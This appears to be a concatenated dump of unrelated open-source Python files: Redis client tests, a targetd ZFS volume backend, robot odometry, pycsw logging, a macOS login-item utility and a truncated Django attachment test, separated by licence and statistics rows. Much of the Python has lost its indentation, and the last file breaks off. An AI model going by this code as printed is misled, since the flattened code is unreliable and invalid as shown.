res = await redis.sort('a')
assert res == [b'1', b'2', b'3', b'4']
res = await redis.sort('a', offset=2, count=2)
assert res == [b'3', b'4']
res = await redis.sort('a', asc=b'DESC')
assert res == [b'4', b'3', b'2', b'1']
await _make_list('a', 'dbca')
res = await redis.sort(
'a', asc=b'DESC', alpha=True, offset=2, count=2
)
assert res == [b'b', b'a']
await redis.set('key:1', 10)
await redis.set('key:2', 4)
await redis.set('key:3', 7)
await _make_list('a', '321')
res = await redis.sort('a', by='key:*')
assert res == [b'2', b'3', b'1']
res = await redis.sort('a', by='nosort')
assert res == [b'3', b'2', b'1']
res = await redis.sort('a', by='key:*', store='sorted_a')
assert res == 3
res = await redis.lrange('sorted_a', 0, -1)
assert res == [b'2', b'3', b'1']
await redis.set('value:1', 20)
await redis.set('value:2', 30)
await redis.set('value:3', 40)
res = await redis.sort('a', 'value:*', by='key:*')
assert res == [b'30', b'40', b'20']
await redis.hset('data_1', 'weight', 30)
await redis.hset('data_2', 'weight', 20)
await redis.hset('data_3', 'weight', 10)
await redis.hset('hash_1', 'field', 20)
await redis.hset('hash_2', 'field', 30)
await redis.hset('hash_3', 'field', 10)
res = await redis.sort(
'a', 'hash_*->field', by='data_*->weight'
)
assert res == [b'10', b'30', b'20']
@pytest.redis_version(3, 2, 1, reason="TOUCH is available since redis>=3.2.1")
@pytest.mark.run_loop(timeout=20)
async def test_touch(redis, loop):
await add(redis, 'key', 'val')
res = 0
while not res:
res = await redis.object_idletime('key')
await asyncio.sleep(.5, loop=loop)
assert res > 0
assert await redis.touch('key', 'key', 'key') == 3
res2 = await redis.object_idletime('key')
assert 0 <= res2 < res
@pytest.mark.run_loop
async def test_ttl(redis, server):
await add(redis, 'key', 'val')
res = await redis.ttl('key')
assert res == -1
res = await redis.ttl('non-existent-key')
if server.version < (2, 8, 0):
assert res == -1
else:
assert res == -2
await redis.expire('key', 10)
res = await redis.ttl('key')
assert res >= 9
with pytest.raises(TypeError):
await redis.ttl(None)
@pytest.mark.run_loop
async def test_type(redis):
await add(redis, 'key', 'val')
res = await redis.type('key')
assert res == b'string'
await redis.delete('key')
await redis.incr('key')
res = await redis.type('key')
assert res == b'string'
await redis.delete('key')
await redis.sadd('key', 'val')
res = await redis.type('key')
assert res == b'set'
res = await redis.type('non-existent-key')
assert res == b'none'
with pytest.raises(TypeError):
await redis.type(None)
@pytest.redis_version(2, 8, 0, reason='SCAN is available since redis>=2.8.0')
@pytest.mark.run_loop
async def test_iscan(redis):
full = set()
foo = set()
bar = set()
for i in range(1, 11):
is_bar = i % 3
foo_or_bar = 'bar' if is_bar else 'foo'
key = 'key:scan:{}:{}'.format(foo_or_bar, i).encode('utf-8')
full.add(key)
if is_bar:
bar.add(key)
else:
foo.add(key)
assert await redis.set(key, i) is True
async def coro(cmd):
lst = []
async for i in cmd:
lst.append(i)
return lst
ret = await coro(redis.iscan())
assert len(ret) >= 10
ret = await coro(redis.iscan(match='key:scan:*'))
assert 10 == len(ret)
assert set(ret) == full
ret = await coro(redis.iscan(match='key:scan:foo*'))
assert set(ret) == foo
ret = await coro(redis.iscan(match='key:scan:bar*'))
assert set(ret) == bar
    # SCAN family functions do not guarantee that the number of
    # elements returned per call is in a given range, so this is just a
    # dummy check that the *count* argument does not break anything
ret = await coro(redis.iscan(match='key:scan:*', count=2))
assert 10 == len(ret)
assert set(ret) == full
@pytest.redis_version(4, 0, 0, reason="UNLINK is available since redis>=4.0.0")
@pytest.mark.run_loop
async def test_unlink(redis):
await add(redis, 'my-key', 123)
await add(redis, 'other-key', 123)
res = await redis.unlink('my-key', 'non-existent-key')
assert res == 1
res = await redis.unlink('other-key', 'other-key')
assert res == 1
with pytest.raises(TypeError):
await redis.unlink(None)
with pytest.raises(TypeError):
await redis.unlink('my-key', 'my-key', None)
@pytest.redis_version(3, 0, 0, reason="WAIT is available since redis>=3.0.0")
@pytest.mark.run_loop
async def test_wait(redis, loop):
await add(redis, 'key', 'val1')
start = await redis.time()
res = await redis.wait(1, 400)
end = await redis.time()
assert res == 0
assert end - start >= .4
await add(redis, 'key', 'val2')
start = await redis.time()
res = await redis.wait(0, 400)
end = await redis.time()
assert res == 0
assert end - start < .4
| mit | -5,231,168,237,388,924,000 | 28.691729 | 79 | 0.614755 | false |
open-iscsi/targetd | targetd/backends/zfs.py | 1 | 16228 | # This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as
# published by the Free Software Foundation; either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
# Copyright 2012-2013, Andy Grover <[email protected]>
#
# Routines specific to ZFS to export zvols over iscsi
import distutils.spawn
import logging
import re
import subprocess
from time import time, sleep
from targetd.main import TargetdError
pools = []
pools_fs = dict()
zfs_cmd = ""
zfs_enable_copy = False
ALLOWED_DATASET_NAMES = re.compile(r"^[A-Za-z0-9][A-Za-z0-9_.\-]*$")
class VolInfo(object):
"""
Just to have attributes compatible with LVM info.
"""
uuid = ""
size = 0
def __init__(self, uuid, size):
self.uuid = uuid
self.size = size
def has_pool(pool_name):
"""
This can be used to check if module owns given pool without raising
exception
"""
return pool_name in pools
def has_fs_pool(pool_name):
"""
This can be used to check if module owns given fs_pool without raising
exception
"""
return pool_name in pools_fs
def has_udev_path(udev_path):
try:
pool, dataset = split_udev_path(udev_path)
except (IndexError, ValueError, TypeError):
return False
return True
def split_udev_path(udev_path):
dataset = udev_path.split("/", 2)[2]
for p in pools:
if dataset.startswith(p + "/"):
return p, dataset.replace(p + "/", "", 1)
def pool2dev_name(pool):
"""
Pool name and dev name (equivalent of vg from LVM) are the same in ZFS
"""
return pool
def dev2pool_name(dev):
"""
Pool name and dev name (equivalent of vg from LVM) are the same in ZFS
"""
return dev
def get_so_name(pool, volname):
"""
Using % here, because it's not allowed in zfs dataset names and
/ is not allowed in target's storage object names
"""
return "%s:%s" % (pool.replace("/", "%"), volname)
def so_name2pool_volume(so_name):
pool_name, vol_name = so_name.split(":")
pool_name = pool_name.replace("%", "/")
return pool_name, vol_name
def has_so_name(so_name):
pool_name, vol_name = so_name.split(":")
pool_name = pool_name.replace("%", "/")
return has_pool(pool_name)
def get_dev_path(pool_name, vol_name):
return "/dev/%s/%s" % (pool2dev_name(pool_name), vol_name)
def initialize(config_dict, init_pools):
global pools
global zfs_enable_copy
zfs_enable_copy = zfs_enable_copy or config_dict["zfs_enable_copy"]
check_pools_access(init_pools)
pools = init_pools
def fs_initialize(config_dict, init_pools):
global pools_fs
global zfs_enable_copy
zfs_enable_copy = zfs_enable_copy or config_dict["zfs_enable_copy"]
pools_fs = {fs["mount"]: fs["device"] for fs in init_pools}
check_pools_access(list(pools_fs.values()))
def _check_dataset_name(name):
if not ALLOWED_DATASET_NAMES.match(name):
raise TargetdError(
TargetdError.INVALID_ARGUMENT,
"Invalid dataset name, can only contain alphanumeric characters,"
"underscores, dots and hyphens",
)
def _zfs_find_cmd():
cmd = distutils.spawn.find_executable("zfs") or distutils.spawn.find_executable(
"zfs", "/sbin:/usr/sbin"
)
if cmd is None or not cmd:
raise TargetdError(
TargetdError.INVALID, "zfs_block_pools is set but no zfs command was found"
)
global zfs_cmd
zfs_cmd = cmd
def _zfs_exec_command(args=None):
if args is None:
args = []
for _ in range(3):
proc = subprocess.Popen(
[zfs_cmd] + args, stdout=subprocess.PIPE, stderr=subprocess.PIPE
)
(out, err) = proc.communicate()
if proc.returncode != 0:
logging.debug(
"zfs command returned non-zero status: %s, %s. Stderr: %s. Stdout: %s"
% (proc.returncode, args, out, err)
)
# See: https://github.com/openzfs/zfs/issues/1810
if b"dataset is busy" in err:
sleep(1)
logging.debug("Retrying on 'dataset is busy' error ...")
continue
else:
return proc.returncode, out, err
else:
return proc.returncode, out, err
def _zfs_get(datasets, properties, recursive=False, fstype="all"):
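    # Runs "zfs get -Hp[r] -t <fstype> <prop,...> <datasets>" and parses the
    # tab-separated output into a {dataset: {property: value}} mapping.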
result = {}
flags = "-Hp"
if recursive:
flags = "-Hpr"
code, out, err = _zfs_exec_command(
["get", flags, "-t", fstype, ",".join(properties)] + datasets
)
for line in out.strip().split(b"\n"):
fields = str(line, encoding="utf-8").strip().split("\t")
if len(fields) < 2:
continue
if fields[0] in result:
result[fields[0]][fields[1]] = fields[2].strip()
else:
result[fields[0]] = {fields[1]: fields[2].strip()}
return result
def check_pools_access(check_pools):
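    # Sanity-check the configured pools: nested parent/child datasets and
    # colons in names are rejected, and every entry must be an existing
    # dataset of type 'filesystem'.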
if any([s.startswith(i + "/") for s in check_pools for i in check_pools]):
raise TargetdError(
TargetdError.INVALID,
"ZFS pools cannot contain both parent and child datasets",
)
if any(":" in p for p in check_pools):
raise TargetdError(TargetdError.INVALID, "Colon in ZFS pools is not supported")
if len(check_pools) == 0:
logging.debug("No ZFS pool defined, skipping ZFS")
return
_zfs_find_cmd()
props = _zfs_get(check_pools, ["type", "name"])
for p in check_pools:
if p not in props or "type" not in props[p]:
raise TargetdError(
TargetdError.INVALID, "ZFS dataset does not exist: %s" % (p,)
)
if props[p]["type"] != "filesystem":
raise TargetdError(
TargetdError.INVALID,
"ZFS dataset must be of 'filesystem' type. %s is %s"
% (p, props[p]["type"]),
)
def block_pools(req):
if not zfs_cmd:
return []
results = []
props = _zfs_get(pools, ["available", "used", "guid"])
for pool in pools:
results.append(
dict(
name=pool,
size=int(props[pool]["available"]) + int(props[pool]["used"]),
free_size=int(props[pool]["available"]),
type="block",
uuid=int(props[pool]["guid"]),
)
)
return results
def volumes(req, pool):
if not zfs_cmd:
return []
allprops = _zfs_get([pool], ["volsize", "guid"], True, "volume")
results = []
for fullname, props in allprops.items():
results.append(
dict(
name=fullname.replace(pool + "/", "", 1),
size=int(props["volsize"]),
uuid=props["guid"],
)
)
return results
def fs_hash():
if not zfs_cmd:
return {}
fs_list = {}
for pool, zfs_pool in pools_fs.items():
allprops = _zfs_get(
[zfs_pool],
["name", "mountpoint", "guid", "used", "available"],
True,
"filesystem",
)
for fullname, props in allprops.items():
if fullname == zfs_pool:
continue
sub_vol = fullname.replace(zfs_pool + "/", "", 1)
key = props["name"]
fs_list[key] = dict(
name=sub_vol,
uuid=props["guid"],
total_space=int(props["used"]) + int(props["available"]),
free_space=int(props["available"]),
pool=pool,
full_path=props["mountpoint"],
)
return fs_list
def vol_info(pool, name):
props = _zfs_get([pool + "/" + name], ["guid", "volsize"], fstype="volume")
if (pool + "/" + name) in props:
props = props[pool + "/" + name]
return VolInfo(props["guid"], int(props["volsize"]))
def fs_info(pool, name):
props = _zfs_get(
[pool + "/" + name], ["guid", "used", "available"], fstype="filesystem"
)
if (pool + "/" + name) in props:
props = props[pool + "/" + name]
return VolInfo(props["guid"], int(props["available"]) + int(props["used"]))
def snap_info(pool, name, snapshot):
props = _zfs_get([pool + "/" + name + "@" + snapshot], ["guid"], fstype="snapshot")
if (pool + "/" + name + "@" + snapshot) in props:
props = props[pool + "/" + name + "@" + snapshot]
return dict(name=pool + "/" + name + "@" + snapshot, uuid=props["guid"])
def create(req, pool, name, size):
_check_dataset_name(name)
code, out, err = _zfs_exec_command(["create", "-V", str(size), pool + "/" + name])
if code != 0:
logging.error(
"Could not create volume %s on pool %s. Code: %s, stderr %s"
% (name, pool, code, err)
)
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not create volume %s on pool %s" % (name, pool),
)
def fs_create(req, pool, name, size):
_check_dataset_name(name)
zfs_pool = pools_fs[pool]
if fs_info(zfs_pool, name) is not None:
raise TargetdError(
TargetdError.EXISTS_FS_NAME, "FS already exists with that name (ZFS)"
)
code, out, err = _zfs_exec_command(["create", zfs_pool + "/" + name])
if code != 0:
logging.error(
"Could not create volume %s on pool %s. Code: %s, stderr %s"
% (name, pool, code, err)
)
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not create volume %s on pool %s" % (name, pool),
)
def destroy(req, pool, name):
_check_dataset_name(name)
    # -r will destroy snapshots and children but not dependent clones
code, out, err = _zfs_exec_command(["destroy", "-r", pool + "/" + name])
if code != 0:
if b"volume has dependent clones" in err:
logging.error(
"Volume %s on %s has dependent clones and cannot be destroyed. Stderr: %s"
% (name, pool, err)
)
raise TargetdError(
TargetdError.INVALID_ARGUMENT,
"Volume %s on %s has dependent clones and cannot be destroyed."
% (name, pool),
)
else:
logging.error(
"Could not destroy volume %s on pool %s. Code: %s, stderr %s"
% (name, pool, code, err)
)
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not destroy volume %s on pool %s" % (name, pool),
)
def fs_destroy(req, pool, name):
zfs_pool = pools_fs[pool]
destroy(req, zfs_pool, name)
def copy(req, pool, vol_orig, vol_new, size, timeout=10):
_copy(req, pool, vol_orig, vol_new, size, vol_info)
def _copy(req, pool, vol_orig, vol_new, size, info_fn, snap=None):
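    # A ZFS "copy" is implemented as snapshot + clone: the source volume is
    # snapshotted (named after the destination plus a timestamp unless a
    # snapshot name is given) and the new volume is a clone of that snapshot,
    # so it remains dependent on the original dataset.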
if not zfs_enable_copy:
raise TargetdError(
TargetdError.NO_SUPPORT,
"Copy on ZFS disabled. Consult manual before enabling it.",
)
_check_dataset_name(vol_orig)
_check_dataset_name(vol_new)
if info_fn(pool, vol_new) is not None:
raise TargetdError(
TargetdError.NAME_CONFLICT,
"Destination volume %s already exists on pool %s" % (vol_new, pool),
)
if snap is None:
snap = vol_new + str(int(time()))
code, out, err = _zfs_exec_command(
["snapshot", "%s/%s@%s" % (pool, vol_orig, snap)]
)
if code != 0:
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not create snapshot of %s on pool %s" % (vol_orig, pool),
)
args = ["clone"]
if size is not None:
args.extend(["-o", "volsize=%d" % size])
args.extend(["%s/%s@%s" % (pool, vol_orig, snap), "%s/%s" % (pool, vol_new)])
code, out, err = _zfs_exec_command(args)
if code != 0:
# try cleaning up the snapshot if cloning goes wrong
_zfs_exec_command(["destroy", "%s/%s@%s" % (pool, vol_orig, snap)])
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE,
"Could not create clone of %s@%s on pool %s" % (vol_orig, snap, pool),
)
def resize(req, pool, name, size):
args = ["set", "volsize=%d" % size, "%s/%s" % (pool, name)]
code, out, err = _zfs_exec_command(args)
if code != 0:
raise TargetdError(TargetdError.UNEXPECTED_EXIT_CODE, "Failed to resize volume")
def ss(req, pool, name):
snapshots = []
zfs_pool = pools_fs[pool]
# NOTE: Recursive is set to True as the ZFS version on Ubuntu in Travis does not appreciate getting snapshots
# by passing in a non-snapshot name. Somewhere between version 0.7.5 and 0.8.4 this got fixed
allprops = _zfs_get(
[zfs_pool + "/" + name], ["name", "guid", "creation"], True, "snapshot"
)
for fullname, props in allprops.items():
# Filter out any subvolume snapshots (these should not generally exist though
# and indicate an administration issue)
if not fullname.startswith(zfs_pool + "/" + name + "@"):
logging.warning(
"found additional subvolumes with snapshots while trying to list snapshots. Please do not"
" create subvolumes underneath targetd managed subvolumes"
)
continue
time_epoch = int(props["creation"])
st = dict(
name=props["name"].replace((zfs_pool + "/" + name + "@"), "", 1),
uuid=props["guid"],
timestamp=time_epoch,
)
snapshots.append(st)
return snapshots
def fs_snapshot(req, pool, name, dest_ss_name):
_check_dataset_name(name)
_check_dataset_name(dest_ss_name)
zfs_pool = pools_fs[pool]
info = snap_info(zfs_pool, name, dest_ss_name)
if info is not None:
raise TargetdError(
TargetdError.EXISTS_FS_NAME,
"Snapshot {0} already exists on pool {1} for {2}".format(
dest_ss_name, pool, name
),
)
code, out, err = _zfs_exec_command(
["snapshot", "{0}/{1}@{2}".format(zfs_pool, name, dest_ss_name)]
)
if code != 0:
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE, "Could not create snapshot"
)
def fs_snapshot_delete(req, pool, name, ss_name):
_check_dataset_name(name)
_check_dataset_name(ss_name)
zfs_pool = pools_fs[pool]
info = snap_info(zfs_pool, name, ss_name)
if info is None:
return
code, out, err = _zfs_exec_command(
["destroy", "-r", "{0}/{1}@{2}".format(zfs_pool, name, ss_name)]
)
if code != 0:
raise TargetdError(
TargetdError.UNEXPECTED_EXIT_CODE, "Could not destroy snapshot"
)
def fs_clone(req, pool, name, dest_fs_name, snapshot_name=None):
zfs_pool = pools_fs[pool]
if fs_info(zfs_pool, dest_fs_name) is not None:
raise TargetdError(
TargetdError.EXISTS_CLONE_NAME, "FS already exists with that name (ZFS)"
)
_copy(req, zfs_pool, name, dest_fs_name, None, fs_info, snapshot_name)
def fs_pools(req):
results = []
for pool, zfs_pool in pools_fs.items():
allprops = _zfs_get(
[zfs_pool], ["name", "used", "available"], False, "filesystem"
)
if zfs_pool in allprops:
props = allprops[zfs_pool]
results.append(
dict(
name=pool,
size=(int(props["used"]) + int(props["available"])),
free_size=int(props["available"]),
type="fs",
)
)
return results
| gpl-3.0 | -1,474,268,533,459,330,600 | 29.107607 | 113 | 0.561868 | false |
merose/diff_drive | src/diff_drive/odometry.py | 1 | 2663 | from __future__ import division
from math import pi, sin, cos
from diff_drive.encoder import Encoder
from diff_drive.pose import Pose
class Odometry:
"""Keeps track of the current position and velocity of a
robot using differential drive.
"""
def __init__(self):
self.leftEncoder = Encoder()
self.rightEncoder = Encoder()
self.pose = Pose()
self.lastTime = 0
def setWheelSeparation(self, separation):
self.wheelSeparation = separation
def setTicksPerMeter(self, ticks):
self.ticksPerMeter = ticks
def setEncoderRange(self, low, high):
self.leftEncoder.setRange(low, high)
self.rightEncoder.setRange(low, high)
def setTime(self, newTime):
self.lastTime = newTime
def updateLeftWheel(self, newCount):
self.leftEncoder.update(newCount)
def updateRightWheel(self, newCount):
self.rightEncoder.update(newCount)
def updatePose(self, newTime):
"""Updates the pose based on the accumulated encoder ticks
of the two wheels. See https://chess.eecs.berkeley.edu/eecs149/documentation/differentialDrive.pdf
for details.
"""
leftTravel = self.leftEncoder.getDelta() / self.ticksPerMeter
rightTravel = self.rightEncoder.getDelta() / self.ticksPerMeter
deltaTime = newTime - self.lastTime
deltaTravel = (rightTravel + leftTravel) / 2
deltaTheta = (rightTravel - leftTravel) / self.wheelSeparation
if rightTravel == leftTravel:
deltaX = leftTravel*cos(self.pose.theta)
deltaY = leftTravel*sin(self.pose.theta)
else:
radius = deltaTravel / deltaTheta
# Find the instantaneous center of curvature (ICC).
iccX = self.pose.x - radius*sin(self.pose.theta)
iccY = self.pose.y + radius*cos(self.pose.theta)
deltaX = cos(deltaTheta)*(self.pose.x - iccX) \
- sin(deltaTheta)*(self.pose.y - iccY) \
+ iccX - self.pose.x
deltaY = sin(deltaTheta)*(self.pose.x - iccX) \
+ cos(deltaTheta)*(self.pose.y - iccY) \
+ iccY - self.pose.y
self.pose.x += deltaX
self.pose.y += deltaY
self.pose.theta = (self.pose.theta + deltaTheta) % (2*pi)
self.pose.xVel = deltaTravel / deltaTime if deltaTime > 0 else 0.
self.pose.yVel = 0
self.pose.thetaVel = deltaTheta / deltaTime if deltaTime > 0 else 0.
self.lastTime = newTime
def getPose(self):
        return self.pose
def setPose(self, newPose):
self.pose = newPose
| bsd-3-clause | 5,621,864,774,542,927,000 | 32.708861 | 106 | 0.618475 | false |
PublicaMundi/pycsw | pycsw/log.py | 1 | 3506 | # -*- coding: iso-8859-15 -*-
# =================================================================
#
# Authors: Tom Kralidis <[email protected]>
#
# Copyright (c) 2011 Tom Kralidis
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation
# files (the "Software"), to deal in the Software without
# restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following
# conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES
# OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT
# HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY,
# WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
#
# =================================================================
import logging
LOGGER = logging.getLogger(__name__)
MSG_FORMAT = '[%(asctime)s] [%(levelname)s] file=%(pathname)s \
line=%(lineno)s module=%(module)s function=%(funcName)s %(message)s'
TIME_FORMAT = '%a, %d %b %Y %H:%M:%S'
LOGLEVELS = {
'CRITICAL': logging.CRITICAL,
'ERROR': logging.ERROR,
'WARNING': logging.WARNING,
'INFO': logging.INFO,
'DEBUG': logging.DEBUG,
'NOTSET': logging.NOTSET,
}
def setup_logger(config=None):
"""Initialize logging facility"""
if config is None:
return None
# Do not proceed if logging has not been set up.
if not (config.has_option('server', 'loglevel') or
config.has_option('server', 'logfile')):
return None
logfile = None
loglevel = 'NOTSET'
if config.has_option('server', 'loglevel'):
loglevel = config.get('server', 'loglevel')
if loglevel not in LOGLEVELS.keys():
raise RuntimeError(
'Invalid server configuration (server.loglevel).')
if not config.has_option('server', 'logfile'):
raise RuntimeError(
'Invalid server configuration (server.loglevel set,\
but server.logfile missing).')
if config.has_option('server', 'logfile'):
if not config.has_option('server', 'loglevel'):
raise RuntimeError(
'Invalid server configuration (server.logfile set,\
but server.loglevel missing).')
logfile = config.get('server', 'logfile')
if loglevel != 'NOTSET' and logfile is None:
raise RuntimeError(
'Invalid server configuration \
(server.loglevel set, but server.logfile is not).')
# Setup logging globally (not only for the pycsw module)
# based on the parameters passed.
logging.basicConfig(level=LOGLEVELS[loglevel],
filename=logfile,
datefmt=TIME_FORMAT,
format=MSG_FORMAT)
LOGGER.info('Logging initialized (level: %s).' % loglevel)
if loglevel == 'DEBUG': # turn on CGI debugging
LOGGER.info('CGI debugging enabled.')
import cgitb
cgitb.enable()
| mit | -4,502,147,059,277,054,000 | 34.06 | 68 | 0.630918 | false |
pudquick/pyLoginItems | pyLoginItems.py | 1 | 8789 | # /System/Library/Frameworks/CoreServices.framework/Versions/A/Frameworks/LaunchServices.framework/Versions/A/Headers/LSSharedFileList.h
# Fun things:
# kLSSharedFileListFavoriteItems
# kLSSharedFileListFavoriteVolumes
# kLSSharedFileListRecentApplicationItems
# kLSSharedFileListRecentDocumentItems
# kLSSharedFileListRecentServerItems
# kLSSharedFileListSessionLoginItems
# kLSSharedFileListGlobalLoginItems - deprecated in 10.9
# Runs in user space, use this with a login script / launchd item / something running as the user
# Example usage:
#
# import pyLoginItems
# >>> pyLoginItems.list_login_items()
# [u'/Applications/Dropbox.app', u'/Applications/iTunes.app/Contents/MacOS/iTunesHelper.app']
#
# pyLoginItems.add_login_item('/Applications/Safari.app', 0)
# pyLoginItems.remove_login_item('/Applications/TextEdit.app')
from platform import mac_ver
from Foundation import NSURL
from LaunchServices import (kLSSharedFileListSessionLoginItems,
                            kLSSharedFileListNoUserInteraction,
                            kLSSharedFileListDoNotMountVolumes)
# Need to manually load in 10.11.x+
os_vers = int(mac_ver()[0].split('.')[1])
if os_vers > 10:
from Foundation import NSBundle
import objc
SFL_bundle = NSBundle.bundleWithIdentifier_('com.apple.coreservices.SharedFileList')
functions = [('LSSharedFileListCreate', '^{OpaqueLSSharedFileListRef=}^{__CFAllocator=}^{__CFString=}@'),
('LSSharedFileListCopySnapshot', '^{__CFArray=}^{OpaqueLSSharedFileListRef=}o^I'),
('LSSharedFileListItemCopyDisplayName', '^{__CFString=}^{OpaqueLSSharedFileListItemRef=}'),
('LSSharedFileListItemResolve', 'i^{OpaqueLSSharedFileListItemRef=}Io^^{__CFURL=}o^{FSRef=[80C]}'),
('LSSharedFileListItemMove', 'i^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}^{OpaqueLSSharedFileListItemRef=}'),
('LSSharedFileListItemRemove', 'i^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}'),
('LSSharedFileListInsertItemURL', '^{OpaqueLSSharedFileListItemRef=}^{OpaqueLSSharedFileListRef=}^{OpaqueLSSharedFileListItemRef=}^{__CFString=}^{OpaqueIconRef=}^{__CFURL=}^{__CFDictionary=}^{__CFArray=}'),
('kLSSharedFileListItemBeforeFirst', '^{OpaqueLSSharedFileListItemRef=}'),
('kLSSharedFileListItemLast', '^{OpaqueLSSharedFileListItemRef=}'),]
objc.loadBundleFunctions(SFL_bundle, globals(), functions)
else:
from LaunchServices import kLSSharedFileListItemBeforeFirst, kLSSharedFileListItemLast, \
LSSharedFileListCreate, LSSharedFileListCopySnapshot, \
LSSharedFileListItemCopyDisplayName, LSSharedFileListItemResolve, \
LSSharedFileListItemMove, LSSharedFileListItemRemove, \
LSSharedFileListInsertItemURL
def _get_login_items():
# Setup the type of shared list reference we want
list_ref = LSSharedFileListCreate(None, kLSSharedFileListSessionLoginItems, None)
# Get the user's login items - actually returns two values, with the second being a seed value
# indicating when the snapshot was taken (which is safe to ignore here)
login_items,_ = LSSharedFileListCopySnapshot(list_ref, None)
return [list_ref, login_items]
def _get_item_cfurl(an_item, flags=None):
if flags is None:
# Attempt to resolve the items without interacting or mounting
        flags = kLSSharedFileListNoUserInteraction | kLSSharedFileListDoNotMountVolumes
err, a_CFURL, a_FSRef = LSSharedFileListItemResolve(an_item, flags, None, None)
return a_CFURL
def list_login_items():
# Attempt to find the URLs for the items without mounting drives
URLs = []
for an_item in _get_login_items()[1]:
URLs.append(_get_item_cfurl(an_item).path())
return URLs
def remove_login_item(path_to_item):
current_paths = list_login_items()
if path_to_item in current_paths:
list_ref, current_items = _get_login_items()
i = current_paths.index(path_to_item)
target_item = current_items[i]
result = LSSharedFileListItemRemove(list_ref, target_item)
def add_login_item(path_to_item, position=-1):
# position:
# 0..N: Attempt to insert at that index position, with 0 being first
# -1: Insert as last item
# Note:
# If the item is already present in the list, it will get moved to the new location automatically.
list_ref, current_items = _get_login_items()
added_item = NSURL.fileURLWithPath_(path_to_item)
if position == 0:
# Seems to be buggy, will force it below
destination_point = kLSSharedFileListItemBeforeFirst
elif position == -1:
destination_point = kLSSharedFileListItemLast
elif position >= len(current_items):
# At or beyond to the end of the current list
position = -1
destination_point = kLSSharedFileListItemLast
else:
# 1 = after item 0, 2 = after item 1, etc.
destination_point = current_items[position - 1]
# The logic for LSSharedFileListInsertItemURL is generally fine when the item is not in the list
# already (with the exception of kLSSharedFileListItemBeforeFirst which appears to be broken, period)
# However, if the item is already in the list, the logic gets really really screwy.
# Your index calculations are invalidated by OS X because you shift an item, possibly shifting the
# indexes of other items in the list.
# It's easier to just remove it first, then re-add it.
current_paths = list_login_items()
if (len(current_items) == 0) or (position == -1):
# Either there's nothing there or it wants to be last
# Just add the item, it'll be fine
result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, [])
elif (position == 0):
# Special case - kLSSharedFileListItemBeforeFirst appears broken on (at least) 10.9
# Remove if already in the list
if path_to_item in current_paths:
i = current_paths.index(path_to_item)
old_item = current_items[i]
result = LSSharedFileListItemRemove(list_ref, old_item)
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
if (len(current_items) == 0):
# Simple case if nothing remains in the list
result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, [])
else:
# At least one item remains.
# The fix for the bug is:
# - Add our item after the first ('needs_fixing') item
# - Move the 'needs_fixing' item to the end
# - Move the 'needs_fixing' item after our added item (which is now first)
needs_fixing = _get_item_cfurl(current_items[0])
# Move our item
result = LSSharedFileListInsertItemURL(list_ref, current_items[0], None, None, added_item, {}, [])
if not (result is None):
# Only shift if the first insert worked
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
# Now move the old item last
result = LSSharedFileListInsertItemURL(list_ref, kLSSharedFileListItemLast, None, None, needs_fixing, {}, [])
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
# Now move the old item back under the new one
result = LSSharedFileListInsertItemURL(list_ref, current_items[0], None, None, needs_fixing, {}, [])
else:
# We're aiming for an index based on something else in the list.
# Only do something if we're not aiming at ourselves.
insert_after_path = _get_item_cfurl(destination_point).path()
if (insert_after_path != path_to_item):
# Seems to be a different file
if path_to_item in current_paths:
# Remove our object if it's already present
i = current_paths.index(path_to_item)
self_item = current_items[i]
result = LSSharedFileListItemRemove(list_ref, self_item)
# Regenerate list_ref and items
list_ref, current_items = _get_login_items()
# Re-find our original target
current_paths = list_login_items()
i = current_paths.index(insert_after_path)
destination_point = current_items[i]
# Add ourselves after the file
result = LSSharedFileListInsertItemURL(list_ref, destination_point, None, None, added_item, {}, [])
| mit | -3,015,296,332,508,749,000 | 53.590062 | 230 | 0.661281 | false |
Anaethelion/django-mapentity | mapentity/tests/test_attachments.py | 1 | 5486 | import mock
from django.test import TestCase, RequestFactory
from django.contrib.auth import get_user_model
from django.contrib.contenttypes.models import ContentType
from django.core.files.uploadedfile import SimpleUploadedFile
from django.core.urlresolvers import reverse
from paperclip.models import Attachment, FileType
from mapentity.views.generic import MapEntityDetail
from .models import DummyModel
User = get_user_model()
def add_url_for_obj(obj):
return reverse('add_attachment', kwargs={
'app_label': obj._meta.app_label,
'module_name': obj._meta.module_name,
'pk': obj.pk
})
class EntityAttachmentTestCase(TestCase):
def setUp(self):
self.user = User.objects.create_user('howard', '[email protected]', 'booh')
def user_perms(p):
